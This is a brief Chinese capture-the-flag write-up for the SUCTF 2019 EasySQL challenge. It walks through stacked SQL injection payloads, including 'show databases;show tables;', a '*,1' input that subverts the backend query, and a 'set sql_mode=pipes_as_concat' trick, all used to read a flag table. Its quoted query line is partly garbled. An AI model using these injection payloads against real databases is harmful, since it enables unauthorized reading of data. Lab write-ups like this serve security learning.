[SUCTF 2019]EasySQL堆叠注入
输入:1;show databases;show tables;
得到:
发现存在Flag;
听说没有过滤*,所以可以直接用注入。
解法①
输入*,1
:
因为内置的sql语句为sql="select".sql="select".post[‘query’]."||flag from Flag";
如果$post[‘query’]的数据为,1,sql语句就变成了select *,1||flag from Flag,也就是select *,1 from Flag。
解法②
输入1;set sql_mode=pipes_as_concat;select 1
:
具体看师傅wp